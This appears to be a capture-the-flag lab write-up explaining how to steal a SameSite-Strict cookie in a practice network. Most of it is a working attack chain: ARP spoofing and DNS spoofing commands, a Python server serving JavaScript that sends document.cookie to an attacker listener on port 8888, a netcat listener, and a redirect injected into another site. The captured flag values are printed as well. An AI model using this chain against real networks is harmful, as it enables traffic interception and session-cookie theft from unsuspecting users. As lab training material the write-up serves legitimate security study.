master
Raw Download raw file

Token 8: SameSite Strict Cookie

Token: PCCC{U_R_The_M0nk3y_M4st3r_75_97cS}

Objective

Steal the tokenStrict cookie from webvictim.pccc. The cookie belongs to domain external.target.pccc on port 80 and is marked SameSite: Strict.

Hosts

  • webvictim.pccc: 10.0.91.136
  • web.pccc: 10.0.91.135
  • Cookie domain: external.target.pccc

Understanding SameSite: Strict

  • Strict cookies are ONLY sent when the request originates from the same site
  • NOT sent on cross-site navigations, even top-level (clicking links from other sites)
  • To steal: the victim must already be ON external.target.pccc OR you need a same-site context

Method: Full Site Takeover via DNS

The key insight: if you control what external.target.pccc serves, you can make the browser believe it’s a same-site request.

Step 1: ARP spoof victim ↔ DNS server

arpspoof -i eth1 -t 10.0.91.136 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.136 &

Step 2: Spoof DNS for external.target.pccc

echo "10.0.91.138 external.target.pccc" > /tmp/dns.txt
dnsspoof -i eth1 -f /tmp/dns.txt

Step 3: Serve malicious page on external.target.pccc

Run a web server on port 80 that serves a page with JavaScript to exfiltrate cookies:

from http.server import HTTPServer, BaseHTTPRequestHandler

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = self.headers.get('Cookie', 'none')
        print(f"[*] Cookie: {cookie}")

        # Serve page that exfiltrates cookie
        html = f'''<html>
<script>
// Cookie visible here because we ARE external.target.pccc
fetch('http://10.0.91.138:8888/?cookie=' + encodeURIComponent(document.cookie));
</script>
</html>'''
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        self.wfile.write(html.encode())

HTTPServer(('0.0.0.0', 80), Handler).serve_forever()

Step 4: Listen for exfiltrated data

nc -nlvp 8888

Step 5: Trigger navigation to external.target.pccc

Inject into web.pccc to redirect victim:

window.location = 'http://external.target.pccc/';
  1. Victim navigates to external.target.pccc (your IP due to DNS spoof)
  2. Browser is now ON external.target.pccc (same-site context)
  3. Your JavaScript reads document.cookie (Strict cookie now accessible)
  4. Exfiltrates to your listener

Captured:

tokenLax=PCCC{C00k13_B4nd1t_09_13qv}; tokenSecure=PCCC{U_R_The_M0nk3y_M4st3r_75_97cS}

Note: The Strict cookie may be named tokenSecure or tokenStrict in the actual cookie jar.

Why It Works

SameSite: Strict only checks that the request originates from the same site. By spoofing DNS:

  1. You become external.target.pccc
  2. When the victim loads your page, the browser considers it “same-site”
  3. JavaScript running in that context can access the Strict cookie
  4. You exfiltrate it to your server

Key Difference from Lax

  • Lax: Cookie sent on cross-site top-level navigation (just redirect and capture in headers)
  • Strict: Cookie NOT sent on cross-site navigation; must execute JavaScript in same-site context to access it

Cleanup

pkill arpspoof
pkill dnsspoof